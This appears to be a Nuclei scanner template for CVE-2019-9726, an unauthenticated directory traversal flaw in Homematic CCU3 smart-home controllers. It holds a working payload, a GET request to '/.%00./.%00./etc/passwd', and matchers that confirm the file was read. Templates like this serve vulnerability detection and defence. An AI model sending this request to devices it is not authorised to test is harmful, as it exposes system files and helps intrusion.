id: CVE-2019-9726 info: name: Homematic CCU3 - Directory Traversal / Arbitrary File Read author: 0x_Akoko severity: high description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited by unauthenticated attackers with access to the web interface. reference: - https://atomic111.github.io/article/homematic-ccu3-fileread - https://www.cvedetails.com/cve/CVE-2019-9726 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9726 cwe-id: CWE-22 tags: cve,cve2019,homematic,lfi requests: - method: GET path: - "{{BaseURL}}/.%00./.%00./etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "bin:.*:0:0:" condition: or - type: status status: - 200